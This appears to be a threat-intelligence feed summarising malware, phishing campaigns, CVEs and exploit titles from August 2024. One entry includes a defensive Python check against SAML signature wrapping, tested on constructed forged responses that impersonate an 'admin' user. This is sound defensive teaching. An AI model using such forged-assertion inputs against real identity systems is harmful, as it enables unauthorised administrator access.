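Expect noise from legitimate rules that call helper scripts via a shell; the combination of a shell wrapper, an odd trigger device and a path outside the package-managed directories is what separates persistence from packaging. Pair the output with the package manager's file ownership check for anything in /lib or /usr/lib.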

24.8.24

PG_MEM - malware targeting PostgreSQL servers for cryptomining

ALERTS

VIRUS

PG_MEM is a new malware variant observed recently in the wild. The campaign distributing this malware leverages brute-force attacks against exposed PostgreSQL database servers. Once the attackers obtain access to the server, they attempt to establish persistence by creating a new privileged account. The threat actors then perform system discovery and deliver the PG_MEM dropper payload, which ultimately delivers an XMRig cryptominer to the infected machine.

24.8.24

Qilin ransomware

RANSOMWARE

RANSOMWARE

Qilin ransomware caught stealing credentials stored in Google Chrome

24.8.24

PEAKLIGHT

MALWARE

Downloader

PEAKLIGHT: Decoding the Stealthy Memory-Only Malware

23.8.24

CMoon: A .NET-based malware worm in Russian gas sector

ALERTS

VIRUS

CMoon, a .NET-based malware worm, was discovered on the website of a compromised Russian gasification and gas supply company. This malware disguises itself as legitimate regulatory documents and replaces various website links with links to malicious executables.

23.8.24

Casbaneiro in the UAE: Impersonating Sharjah Ports Authority

ALERTS

GROUP

In cybersecurity, ports and related authorities are high-value targets for threat actors due to their integral roles in global supply chains and connections to industries such as transportation, logistics, energy, and government sectors. Crooks often disguise themselves as port authorities to lure other industries into phishing scams or social engineering attacks.

23.8.24

NGate - a novel Android malware able to relay NFC data to the attackers

ALERTS

VIRUS

A new campaign leveraging Android malware dubbed NGate has been targeting users of Czech banks. NGate uses a novel technique to relay NFC (near field communication) data from the victims' payment cards via the compromised Android phones and over to the attackers' devices.

23.8.24

North Korean group puNK exploits Windows shortcuts to deploy Lilith RAT

ALERTS

VIRUS

A previously unidentified North Korean threat actor group dubbed puNK has been detected using Windows shortcut (LNK) files to distribute malware. When executed, these LNK files download AutoIt scripts from the attacker's server, which subsequently fetch the final payload, the Lilith RAT. Lilith RAT, written in C++, is an open-source remote-control tool that gives the attackers further remote operations on the host.

23.8.24

Insom ransomware

ALERTS

RANSOM

Insom is the latest variant from the Makop ransomware family. The malware encrypts user files and appends the .Insom extension to the renamed file names. A unique victim ID and the malware developers' email address are also appended to the file name. The malware has the functionality to remove volume shadow copies from the infected endpoint.

23.8.24

Toll Road Smishing Scams Increasingly Target U.S. Drivers

ALERTS

PHISHING

The U.S. has an extensive network of toll roads, bridges, and tunnels, and toll services are used to fund the maintenance and development of infrastructure without relying solely on state and federal taxes.

23.8.24

TodoSwift: New macOS threat masquerading as a PDF

ALERTS

VIRUS

A new macOS malware dubbed TodoSwift has been identified as disguising itself as a PDF download. The threat actor, likely from North Korea, employs a dropper application developed using Swift/SwiftUI. The dropper deceives users by presenting a seemingly legitimate PDF related to Bitcoin pricing.

23.8.24

North Korean-based threat actor develops MoonPeak RAT

ALERTS

VIRUS

MoonPeak is a recently discovered remote access Trojan (RAT) attributed to North Korea-based threat actors. This RAT is a variant of the open-source XenoRAT malware and has seen multiple evolutions. Cisco Talos researchers have published an analysis of MoonPeak along with related threat actor infrastructure.

23.8.24

Cthulhu

MALWARE

MacOS

From the Depths: Analyzing the Cthulhu Stealer Malware for macOS

23.8.24

FM11RF08S

MALWARE

Backdoor

MIFARE Classic: exposing the static encrypted nonce variant... and a few hardware backdoors

23.8.24

CVE-2024-28987

VULNERABILITY

CVE

Web Help Desk Hardcoded Credential Vulnerability (CVE-2024-28987)

23.8.24

CVE-2024-20399

VULNERABILITY

CVE

A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands.

23.8.24

ALBeast

VULNERABILITY

CVE

The Hunt for ALBeast: A Technical Walkthrough

22.8.24

CVE-2024-0519

VULNERABILITY

CVE

Out-of-bounds memory access in V8

22.8.24

CVE-2024-2886

VULNERABILITY

CVE

Use-after-free in WebCodecs (demonstrated at Pwn2Own 2024)

22.8.24

CVE-2024-2887

VULNERABILITY

CVE

Type confusion in WebAssembly (demonstrated at Pwn2Own 2024)

22.8.24

CVE-2024-3159

VULNERABILITY

CVE

Out-of-bounds memory access in V8 (demonstrated at Pwn2Own 2024)

22.8.24

CVE-2024-4671

VULNERABILITY

CVE

Use-after-free in Visuals

22.8.24

CVE-2024-4761

VULNERABILITY

CVE

Out-of-bounds write in V8

22.8.24

CVE-2024-4947

VULNERABILITY

CVE

Type confusion in V8

22.8.24

CVE-2024-5274

VULNERABILITY

CVE

Type confusion in V8

22.8.24

CVE-2024-7971

VULNERABILITY

CVE

Type confusion in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

22.8.24

LiteSpeed Cache

VULNERABILITY

CVE

Critical Privilege Escalation in LiteSpeed Cache Plugin

22.8.24

CVE-2024-6800

VULNERABILITY

CVE

An XML signature wrapping vulnerability was present in GitHub Enterprise Server (GHES) when utilizing SAML authentication with specific identity providers. This vulnerability allowed an attacker with direct network access to GitHub Enterprise Server to forge a SAML response to provision and/or gain access to a user with site administrator privileges.
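XML signature wrapping, the bug class behind CVE-2024-6800 above, works because the code that verifies the signature and the code that reads the Assertion can disagree about which element was signed: the library finds and verifies the genuine signed Assertion wherever the attacker has hidden it, while the application consumes an unsigned forged Assertion sitting at the expected position. The check below is an added example, not GitHub's code: it runs after the cryptographic verification (assumed to be done by the SAML library) and refuses any Response in which the consumed Assertion is not the one a top-level ds:Reference points at. The three SAML documents are constructed.

```python
"""Structural defence against XML signature wrapping in a SAML Response.

Added example, not GitHub's code. Assumes the cryptographic signature check is done
elsewhere; this only pins the signed element to the consumed Assertion. XML below is
constructed, with the Signature reduced to the SignedInfo/Reference that matters here.
"""
import xml.etree.ElementTree as ET

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}


def select_signed_assertion(response_xml: str) -> ET.Element:
    """Return the single Assertion the signature actually covers, or raise ValueError."""
    root = ET.fromstring(response_xml)
    if root.tag != f"{{{NS['samlp']}}}Response":
        raise ValueError("root element is not samlp:Response")
    ids = [el.get("ID") for el in root.iter() if el.get("ID") is not None]
    if len(ids) != len(set(ids)):
        raise ValueError("duplicate ID attributes: possible wrapping attack")
    assertions = root.findall("saml:Assertion", NS)  # direct children only
    if len(assertions) != 1:
        raise ValueError(f"expected exactly one Assertion, found {len(assertions)}")
    assertion = assertions[0]
    # Only Signatures that are direct children of the Response or of that Assertion count;
    # a Signature buried inside an attacker-supplied wrapper element is ignored.
    refs = []
    for parent in (root, assertion):
        for sig in parent.findall("ds:Signature", NS):
            refs += [r.get("URI", "") for r in sig.findall("ds:SignedInfo/ds:Reference", NS)]
    if not refs:
        raise ValueError("no Signature directly on the Response or the Assertion")
    signed_ids = {uri.lstrip("#") for uri in refs}
    if assertion.get("ID") not in signed_ids and root.get("ID") not in signed_ids:
        raise ValueError("Signature does not cover the Assertion being consumed")
    return assertion


_HEAD = ('<samlp:Response xmlns:samlp="%s" xmlns:saml="%s" xmlns:ds="%s" ID="_resp1">'
         % (NS["samlp"], NS["saml"], NS["ds"]))
_SIGNED_ASSERTION = (
    '<saml:Assertion ID="_a1">'
    '<ds:Signature><ds:SignedInfo><ds:Reference URI="#_a1"/></ds:SignedInfo></ds:Signature>'
    '<saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject>'
    '</saml:Assertion>')

# Constructed: the honest response from the IdP
GOOD_RESPONSE = _HEAD + _SIGNED_ASSERTION + "</samlp:Response>"
# Constructed: signed Assertion moved into Extensions, forged unsigned Assertion at top level
WRAPPED_RESPONSE = (_HEAD + "<samlp:Extensions>" + _SIGNED_ASSERTION + "</samlp:Extensions>"
                    + '<saml:Assertion ID="_evil"><saml:Subject><saml:NameID>admin</saml:NameID>'
                    + "</saml:Subject></saml:Assertion></samlp:Response>")
# Constructed: forged Assertion appended beside the signed one
TWO_ASSERTIONS = GOOD_RESPONSE.replace("</samlp:Response>",
                                       '<saml:Assertion ID="_a2"/></samlp:Response>')

if __name__ == "__main__":
    for name, doc in (("good", GOOD_RESPONSE), ("wrapped", WRAPPED_RESPONSE), ("two", TWO_ASSERTIONS)):
        try:
            print(name, "->", select_signed_assertion(doc).find("saml:Subject/saml:NameID", NS).text)
        except ValueError as e:
            print(name, "-> rejected:", e)
```

The rule of thumb this encodes is "consume only what you verified": take the NameID from the element returned here, never from a separate XPath over the whole document, because the second lookup is exactly the path a wrapping attack exploits.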

22.8.24

CVE-2024-6337

VULNERABILITY

CVE

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed a GitHub App with only content: read and pull_request_write: write permissions to read issue content inside a private repository.

22.8.24

CVE-2024-7711

VULNERABILITY

CVE

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server, allowing an attacker to update the title, assignees, and labels of any issue inside a public repository.

22.8.24

PG_MEM

MALWARE

CRYPTOCURRENCY

PG_MEM: A Malware Hidden in the Postgres Processes

22.8.24

CVE-2024-38206

VULNERABILITY

CVE

Microsoft Copilot Studio Information Disclosure Vulnerability

21.8.24

MoonPeak

MALWARE

RAT

MoonPeak malware from North Korean actors unveils new details on attacker infrastructure

21.8.24

Styx

MALWARE

Stealer

Unmasking Styx Stealer: How a Hacker’s Slip Led to an Intelligence Treasure Trove

21.8.24

TodoSwift

MALWARE

MacOS

TodoSwift Disguises Malware Download Behind Bitcoin PDF

21.8.24

Quasar RAT (aka BlotchyQuasar) Malspam Targeting Italian Banks

ALERTS

VIRUS

Threat researchers have recently observed an email spam campaign spreading Quasar RAT malware which is primarily targeting Italy. The campaign uses deceptive emails that mimic official communications from the Ministry of the Interior, complete with their logos. While the malware and C2 servers remain the same, the URLs for downloading the malicious files have been updated. The malware specifically targets users of certain Italian banks.

21.8.24

Cybercriminals' Relentless Use of Fake CVs to Breach Corporate Defenses

ALERTS

CRIME

There is a long list of social engineering tactics in the cybersecurity world, and while it is always fluctuating, some methods are well-established such as sending fake CVs. This tactic involves emailing a fake Curriculum Vitae (CV) and motivation letter, often targeting HR departments or managers.

21.8.24

QWERTY Stealer: New infostealer variant

ALERTS

VIRUS

QWERTY is a newly discovered infostealer variant observed being hosted on a Linux-based virtual private server located in Germany with limited service exposure. The malware is capable of performing various checks for the presence of debugging or virtualized environments before execution and has the capability to download additional payloads.

21.8.24

Styx Stealer malware

ALERTS

VIRUS

Styx Stealer is a new infostealing malware variant discovered by researchers from Check Point. The malware has the functionality to exfiltrate various data from Chromium-based browsers including cookies, credentials, banking details, cryptocurrency wallets, files with pre-defined extensions, and Telegram and Discord sessions, among others.

21.8.24

New Msupedge backdoor employs communication via DNS traffic

ALERTS

VIRUS

A previously unseen backdoor (Backdoor.Msupedge) utilizing an infrequently seen technique was deployed in an attack against a university in Taiwan. The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic. While the technique is known and has been used by multiple threat actors, it is nevertheless something that is not often seen.

21.8.24

A new and emerging malware dubbed UULoader

ALERTS

VIRUS

Recent research has observed a malware campaign with an increase in the use of malicious .msi files, which, while not common, are a known method of malware distribution. The new malware strain identified is 'UULoader,' used to deliver next-stage payloads such as Gh0st RAT and Mimikatz. It is distributed through malicious installers disguised as legitimate applications, primarily targeting Korean and Chinese-speaking users.

21.8.24

CVE-2024-6220

VULNERABILITY

CVE

(CVSS score: 9.8) - An arbitrary file upload flaw in the 简数采集器 (Keydatas) plugin that allows unauthenticated attackers to upload arbitrary files on the affected site's server, ultimately resulting in code execution

21.8.24

CVE-2024-6467

VULNERABILITY

CVE

(CVSS score: 8.8) - An arbitrary file read flaw in the BookingPress appointment booking plugin that allows authenticated attackers, with Subscriber-level access and above, to create arbitrary files and execute arbitrary code or access sensitive information

21.8.24

CVE-2024-5441

VULNERABILITY

CVE

(CVSS score: 8.8) - An arbitrary file upload flaw in the Modern Events Calendar plugin that allows authenticated attackers, with subscriber access and above, to upload arbitrary files on the affected site's server and execute code

21.8.24

CVE-2024-6411

VULNERABILITY

CVE

(CVSS score: 8.8) - A privilege escalation flaw in the ProfileGrid – User Profiles, Groups and Communities plugin that allows authenticated attackers, with Subscriber-level access and above, to update their user capabilities to that of an Administrator

21.8.24

pwish

HACKING

PHISHING

Be careful what you pwish for – Phishing in PWA applications

21.8.24

UTG-Q-010

GROUP

GROUP

UTG-Q-010: Targeted Attack Campaign Against the AI and Gaming Industry

21.8.24

WireServing

EXPLOIT

EXPLOIT

"WireServing" Up Credentials: Escalating Privileges in Azure Kubernetes Services

21.8.24

CharmingCypress

MALWARE

Families

CharmingCypress: Innovating Persistence

21.8.24

TA453

GROUP

GROUP

Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset

21.8.24

BlindEagle

APT

APT

BlindEagle flying high in Latin America

21.8.24

CVE-2024-23897

VULNERABILITY

CVE

Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.

21.8.24

UULoader

MALWARE

Loader

Meet UULoader: An Emerging and Evasive Malicious Installer

21.8.24

NUMOZYLOD

MALWARE

MaaS

Finding Malware: Unveiling NUMOZYLOD with Google Security Operations

21.8.24

Xeon Sender

TOOL

Phishing/Spam

Xeon Sender | SMS Spam Shipping Multi-Tool Targeting SaaS Credentials

21.8.24

CVE-2024-38193

VULNERABILITY

CVE

Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability

21.8.24

FIN7

APT

APT

FIN7: The Truth Doesn't Need to be so STARK

20.8.24

RedLine Stealer Impersonates Oil and Gas Company, Targets Key Sectors in Vietnam

ALERTS

VIRUS

Symantec has recently observed a RedLine Stealer malspam campaign in which an actor is impersonating a leading oil and gas company in Vietnam specializing in exploration and production activities. Both local and international companies in Vietnam across various sectors - including oil and gas, industrial, electrical and HVAC manufacturers, paint, chemical, and hotel industries - are being targeted.

20.8.24

Ailurophile Infostealer

ALERTS

VIRUS

Ailurophile is a new PHP-based infostealer variant recently identified in the wild. The malware is advertised online and sold via a subscription model. Ailurophile's capabilities include theft of data stored in browsers, including auto-fill information, cookies, credentials, banking details, browsing history and cryptocurrency wallets. The infostealer can also exfiltrate data files from the compromised machines according to predefined search criteria such as keywords in filenames or specific extensions.

20.8.24

Fake Apps target Indian government's PM Kisan Yojana beneficiaries

ALERTS

VIRUS

The PM Kisan Yojana is a historic initiative by the Indian government that is currently benefiting around eight crore farmers across India. Every year, eligible farmers receive a total of INR 6,000, which is distributed in three equal installments of INR 2,000 each.

20.8.24

Hawk Eye Ransomware

ALERTS

RANSOM

A ransomware actor that goes by the name "Hawk Eye" has been observed in the wild. Files that have been successfully encrypted are appended with a random 4-character extension. The ransom note (read_it.txt) is dropped in various folders, and the desktop wallpaper is changed to a white hawk on a black background.

20.8.24

Crypto Investment Scams Posing as Tesla

ALERTS

CRYPTOCURRENCY

A recent report reveals that attackers are exploiting Tesla's name to promote cryptocurrency scams. These scammers have registered domains containing 'Tesla' to deceive users into visiting malicious links. The links lead to the download of a harmful Android application, which is promoted on social platforms such as YouTube and Telegram.

20.8.24

Threat actor Damselfly conducts campaigns against the U.S. and Israel

ALERTS

APT

Damselfly (aka APT42, Charming Kitten) is a well-established Iran-based threat actor. The group has routinely attacked high-value targets in both the U.S. and Israel. The main goal of these attacks is to steal credentials from entities such as NGOs and academic, government, and defense/military organizations to further Iran's own military and political ideals.

20.8.24

BANSHEE Infostealer

ALERTS

VIRUS

Just this month, a new macOS malware called "BANSHEE Stealer" was discovered, created by Russian threat actors. It affects both x86_64 and ARM64 macOS systems and poses a significant threat by targeting crucial system information, browser data, and cryptocurrency wallets.

20.8.24

New Gafgyt botnet variant observed in the wild

ALERTS

BOTNET

A new Gafgyt botnet variant has been observed in the wild. The malware is spread in a distribution campaign that targets endpoints with weak SSH credentials and deploys two distinct ELF binaries. One of the files is a Go-based Gafgyt binary with various capabilities, including system discovery, command execution, scanning for exposed SSH/Telnet access and brute-force attacks against the targeted systems. The second binary is an XMRig cryptominer used to mine the Monero cryptocurrency.

20.8.24

New ValleyRAT malware distribution campaign

ALERTS

VIRUS

A new ValleyRAT malware distribution campaign targeted at Chinese speakers has been reported by researchers from Fortinet. The attackers behind this campaign rely on various components, including shellcode executed for reflective DLL loading and a beaconing module used to fetch additional components. The campaign's payload, ValleyRAT, is a multi-staged malware variant with capabilities including monitoring of user activities, screenshot grabbing, plugin execution, arbitrary file download and others.

20.8.24

Cyclops Go-based malware

ALERTS

VIRUS

Cyclops is a recently identified Go-based malware implant and a likely successor to the BellaCiao malware family. The known malware binary masquerades as a "Microsoft SqlServer.exe" executable in an attempt to impersonate an SQL Server update file and to possibly be deployed on otherwise vulnerable server instances.

17.8.24

.env Files to Breach Cloud Accounts in Extortion Campaign

INCIDENT

Cloud Computing

Leaked Environment Variables Allow Large-Scale Extortion Operation of Cloud Environments

16.8.24

SharpRhino

MALWARE

RAT

SharpRhino – New Hunters International RAT Identified by Quorum Cyber

16.8.24

Tusk

CAMPAIGN

Malware

Tusk: unraveling a complex infostealer campaign

16.8.24

ValleyRAT

MALWARE

RAT

A Deep Dive into a New ValleyRAT Campaign Targeting Chinese Speakers

16.8.24

Cuckoo

MALWARE

MacOS

Update: Cuckoo Malware Evolves

16.8.24

BANSHEE

MALWARE

MacOS

Beyond the wail: deconstructing the BANSHEE infostealer

16.8.24

Multiple SMTP services are susceptible to spoofing attacks due to insufficient enforcement

ALERT

ALERT

Multiple hosted, outbound SMTP servers are vulnerable to email impersonation. This allows authenticated users and certain trusted networks to send emails containing spoofed sender information.

16.8.24

Cyclops Go-based malware

ALERTS

VIRUS

Cyclops is a recently identified Go-based malware implant and a likely successor to the BellaCiao malware family. The known malware binary masquerades as a "Microsoft SqlServer.exe" executable in an attempt to impersonate an SQL Server update file and to possibly be deployed on otherwise vulnerable server instances.

16.8.24

Pupy RAT distributed in recent UTG-Q-010 APT campaign

ALERTS

VIRUS

Pupy RAT malware has been reported to be distributed in a new campaign attributed to the UTG-Q-010 threat group. The attackers leverage phishing messages containing cryptocurrency lures or emails masquerading as job resumes. The attack chain involves the use of malicious .lnk files with an embedded DLL loader, ending in Pupy RAT payload deployment.

16.8.24

Discovery of tools and batch scripts targeting Windows and Linux systems

ALERTS

HACKING

According to a recent DFIR report, a range of threat actor tools has been found that can bypass security defenses like Windows Defender and Malwarebytes, delete backups, and disable systems. Among the discovered tools were Ngrok for proxy services and SystemBC, along with two well-known command-and-control frameworks: Sliver and PoshC2.

16.8.24

Malspam attacks target AnyDesk and Microsoft Teams

ALERTS

VIRUS

Researchers recently found another campaign which starts with an email bomb and then involves a phone call via Microsoft Teams. The attacker persuades victims to download AnyDesk, a remote access tool, which allows them to take control of the victim's computer. Once they have control, the attacker runs malicious payloads and steals data from the system.

16.8.24

New macOS malware uses SwiftUI and OpenDirectory API for credential theft

ALERTS

VIRUS
A new multi-stage macOS stealer malware has been recently reported. The malware exhibits many traits such as the following:

16.8.24

.shop gTLD becomes a new favorite to spread waves of cryptocurrency spam emails

ALERTS

SPAM

Lately, the .shop gTLD has been heavily abused by threat actors to spread cryptocurrency spam emails. The .shop gTLD (generic top-level domain) was launched in 2016 and is specially designed for online shopping or e-commerce platforms and can be used by retailers and e-commerce stores, among others.

16.8.24

Datablack ransomware

ALERTS

RANSOM

Datablack is a new ransomware variant observed in the wild. The malware exhibits similarities to ransomware strains from the Proton malware family. Datablack encrypts user files and appends the .Datablack extension to the renamed file name. The ransom note is dropped in the form of a text file called #Recovery.txt, in which the attackers ask the victims to contact them via the email addresses provided for further instructions regarding data decryption.

16.8.24

Gigabud mobile malware shows links to the Golddigger trojan

ALERTS

VIRUS

A new variant of the Gigabud Android malware has been observed in the wild. While the initial strain of this malware has been known since at least 2023, the distribution of the new variant has expanded and it now targets various countries across the world. The malware is often spread via phishing websites masquerading as the Google Play Store or sites impersonating various banks or governmental entities.

16.8.24

CVE-2024-38856 - Apache OFBiz Pre-Authentication RCE vulnerability

ALERTS

VULNERABILITY

CVE-2024-38856 is a recently disclosed critical (CVSS score 9.8) pre-authentication remote code execution vulnerability affecting Apache OFBiz versions up to 18.12.14. The vulnerability originates from a flaw in the override view functionality. Once exploited, it allows unauthenticated attackers to achieve remote code execution via crafted requests.

16.8.24

Allarich Ransomware

ALERTS

RANSOM

A new ransomware dubbed Allarich has emerged recently in the ransomware landscape. It encrypts files, appending the ".allarich" extension to them, and changes the desktop wallpaper. After completing the encryption process, the ransomware generates a ransom note titled "README.txt".

16.8.24

Phishing campaign impersonates Google Safety Centre

ALERTS

CAMPAIGN

A phishing campaign reportedly impersonating the Google Safety Centre is deceiving users into downloading a malicious file disguised as Google Authenticator. This file installs two types of malware: Latrodectus, a downloader that executes commands from a C&C server, and ACR Stealer, which employs Dead Drop Resolver to obscure its C&C server details. The campaign showcases advanced evasion techniques amid ongoing efforts to refine the malware.

16.8.24

Actor240524's spear-phishing campaign targets Azerbaijan and Israel with ABCloader

ALERTS

GROUP

A spear-phishing campaign by a new threat actor, Actor240524, targeting Azerbaijan and Israel has been observed. Users are lured with disguised government official documents containing embedded VBA macros that deliver the ABCloader payload upon execution. ABCloader decrypts and loads an ABCsync DLL, which then communicates with the C2 server for remote commands. The malware employs anti-sandbox and anti-debug techniques to evade detection.

16.8.24

Phishing Attack Delivers 0bj3ctivity Stealer via Discord CDN

ALERTS

PHISHING

A phishing attack has been reported involving the 0bj3ctivity Stealer, facilitated by the Ande Loader. The attack uses a Discord CDN link containing a malicious JavaScript file with an embedded PowerShell script to deploy additional payloads. The Ande Loader is used for both initial infection and persistence. The stealer exfiltrates sensitive data from browsers to either Telegram or a C2 server and includes anti-debug and anti-VM capabilities.

16.8.24

Grayfly evolves its attack vectors with new loaders and tactics

ALERTS

VIRUS

Grayfly (also known as Earth Baku) has been observed expanding its reach from the Indo-Pacific region to a global scale, targeting sectors such as healthcare, media, government, education, and more. In a recent campaign, the threat actor leveraged public-facing applications like IIS servers for initial access and deployed the Godzilla webshell for control.

16.8.24

DeathGrip: Emergence of a new Ransomware-as-a-Service

ALERTS

RANSOM

A new Ransomware-as-a-Service (RaaS) called DeathGrip ransomware has emerged in the expanding ransomware threat landscape. Promoted through Telegram and other underground forums, DeathGrip RaaS offers aspiring threat actors on the dark web sophisticated ransomware tools, including LockBit 3.0 and Chaos builders. Their payloads, created using leaked ransomware builders, are already being observed in real-world attacks, enabling individuals with minimal technical skills to deploy fully developed ransomware attacks.

16.8.24

Spoofed Australian Taxation Office (ATO) email notifications appear in phish runs

ALERTS

SPAM

The Australian Taxation Office (ATO) is the Government of Australia's revenue collection authority. Recently, Symantec has observed phishing attempts mimicking the ATO, enticing users to open fake notification emails. The email states that a notice of assessment requires the user's immediate attention due to ongoing scheduled maintenance.

16.8.24

CVE-2024-40628/CVE-2024-40629 - JumpServer File Read and Upload vulnerabilities

ALERTS

VULNERABILITY

CVE-2024-40628 and CVE-2024-40629 are recently disclosed file read and file upload vulnerabilities affecting the JumpServer Ansible module. Successful exploitation of the flaws might allow low-privilege accounts to read and write files in the Celery container, posing both a risk of sensitive information disclosure and potential arbitrary code execution within the context of the affected application.

16.8.24

Phishers targeting users in South Korea with tax receipts

ALERTS

PHISHING

Symantec has observed a phishing campaign targeting users in South Korea. The attack attempts to impersonate major accounting firms sending tax receipts/invoices in order to lure recipients into opening the attachment. The attachment, likely in a bid to fool intended victims, also shares a name with the National Tax Service in South Korea: 'NTS_eTaxInvoice.html'.

15.8.24

CVE-2024-38173

VULNERABILITY

CVE

Microsoft Outlook Remote Code Execution Vulnerability

15.8.24

CVE-2024-38198

VULNERABILITY

CVE

Windows Print Spooler Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38202

VULNERABILITY

CVE

(CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability

15.8.24

CVE-2024-21302

VULNERABILITY

CVE

(CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38199

VULNERABILITY

CVE

(CVSS score: 9.8) - Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability

15.8.24

CVE-2024-38213

VULNERABILITY

CVE

(CVSS score: 6.5) - Windows Mark of the Web Security Feature Bypass Vulnerability

15.8.24

CVE-2024-38107

VULNERABILITY

CVE

(CVSS score: 7.8) - Windows Power Dependency Coordinator Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38106

VULNERABILITY

CVE

(CVSS score: 7.0) - Windows Kernel Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38193

VULNERABILITY

CVE

(CVSS score: 7.8) - Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability

15.8.24

CVE-2024-38178

VULNERABILITY

CVE

(CVSS score: 7.5) - Windows Scripting Engine Memory Corruption Vulnerability

15.8.24

CVE-2024-38189

VULNERABILITY

CVE

(CVSS score: 8.8) - Microsoft Project Remote Code Execution Vulnerability

15.8.24

CVE-2024-7570

VULNERABILITY

CVE

(CVSS score: 8.3) - Improper certificate validation in Ivanti ITSM on-prem and Neurons for ITSM Versions 2023.4 and earlier allows a remote attacker in a MITM position to craft a token that would allow access to ITSM as any user

15.8.24

CVE-2024-7569

VULNERABILITY

CVE

(CVSS score: 9.6) - An information disclosure vulnerability in Ivanti ITSM on-prem and Neurons for ITSM versions 2023.4 and earlier allows an unauthenticated attacker to obtain the OIDC client secret via debug information

15.8.24

Actor240524

GROUP

APT

New APT Group Actor240524: A Closer Look at Its Cyber Tactics Against Azerbaijan and Israel

15.8.24

ArtiPACKED

HACKING

HACKING

ArtiPACKED: Hacking Giants Through a Race Condition in GitHub Actions Artifacts

15.8.24

RansomHub

RANSOMWARE

RANSOMWARE

Ransomware attackers introduce new EDR killer to their arsenal

15.8.24

Gafgyt

BOTNET

BOTNET

Gafgyt Malware Variant Exploits GPU Power and Cloud Native Environments

15.8.24

River of Phish

CAMPAIGN

Phishing

SPEAR-PHISHING CASES FROM EASTERN EUROPE 2022-2024: A TECHNICAL BRIEF

15.8.24

CVE-2024-5916

VULNERABILITY

CVE

(CVSS score: 6.0) - An information exposure vulnerability in PAN-OS software that enables a local system administrator to access secrets, passwords, and tokens of external systems

15.8.24

CVE-2024-5915

VULNERABILITY

CVE

(CVSS score: 5.2) - A privilege escalation (PE) vulnerability in the GlobalProtect app on Windows devices that enables a local user to execute programs with elevated privileges

15.8.24

CVE-2024-28986

VULNERABILITY

CVE

SolarWinds Web Help Desk Java Deserialization Remote Code Execution Vulnerability (CVE-2024-28986)

15.8.24

Earth Baku

CAMPAIGN

CAMPAIGN

A Dive into Earth Baku’s Latest Campaign

15.8.24

GhostWrite

PAPERS

CPU

RISCVuzz: Discovering Architectural CPU Vulnerabilities via Differential Hardware Fuzzing

15.8.24

GhostWrite

VULNERABILITY

CPU

RISCVuzz: Discovering Architectural CPU Vulnerabilities via Differential Hardware Fuzzing

13.8.24

CVE-2024-33892

VULNERABILITY

CVE

(CVSS score: 7.4) - Information leakage through cookies

13.8.24

CVE-2024-33893

VULNERABILITY

CVE

(CVSS score: 2.1) - XSS when displaying the logs due to improper input sanitization

13.8.24

CVE-2024-33894

VULNERABILITY

CVE

(CVSS score: 1.0) - Execution of several processes with elevated privileges

13.8.24

CVE-2024-33895

VULNERABILITY

CVE

(CVSS score: 4.4) - Usage of a unique key to encrypt the configuration parameters

13.8.24

CVE-2024-33896

VULNERABILITY

CVE

(CVSS score: 3.3) - Code injection due to improper parameter blacklisting

13.8.24

CVE-2024-33897

VULNERABILITY

CVE

(CVSS score: N/A) - A compromised device could be used to request a Certificate Signing Request (CSR) from Talk2m for another device, resulting in an availability issue

13.8.24

Compromising Microsoft's AI Healthcare Chatbot Service

INCIDENT

AI

Tenable Research discovered multiple privilege-escalation issues in the Azure Health Bot Service via a server-side request forgery (SSRF), which allowed researchers access to cross-tenant resources.

13.8.24

CVE-2024-7589

VULNERABILITY

CVE

OpenSSH is an implementation of the SSH protocol suite, providing an encrypted and authenticated transport for a variety of services, including remote shell access.

13.8.24

APT trends report Q2 2024

ANALYSIS

APT

For over six years now, Kaspersky’s Global Research and Analysis Team (GReAT) has been sharing quarterly updates on advanced persistent threats (APTs).

11.8.24

Devika v1 - Path Traversal via 'snapshot_path'

Exploit

WebApps

Python

11.8.24

Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path

Exploit

Local

Windows

11.8.24

SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path

Exploit

Local

Windows

11.8.24

Oracle Database 12c Release 1 - Unquoted Service Path

Exploit

Local

Windows

11.8.24

Ivanti vADC 9.9 - Authentication Bypass

Exploit

WebApps

Multiple

11.8.24

Bonjour Service 'mDNSResponder.exe' - Unquoted Service Path Privilege Escalation

Exploit

Local

Windows

11.8.24

QuickShell

EXPLOIT

EXPLOIT

QuickShell: Sharing Is Caring about an RCE Attack Chain on Quick Share

11.8.24

CVE-2024-38272

VULNERABILITY

CVE

(CVSS score: 7.1) - A vulnerability that allows an attacker to bypass the accept file dialog on Windows

11.8.24

CVE-2024-38271

VULNERABILITY

CVE

(CVSS score: 5.9) - A vulnerability that forces a victim to stay connected to a temporary Wi-Fi connection created for sharing

11.8.24

2024-08-08 - Sixteen days of server scans and probes

MALWARE TRAFFIC

MALWARE TRAFFIC

Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

11.8.24

2024-07-23 - Eight days of server scans and probes

MALWARE TRAFFIC

MALWARE TRAFFIC

Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

10.8.24

Breaching AWS Accounts Through Shadow Resources

VULNERABILITY

CVE

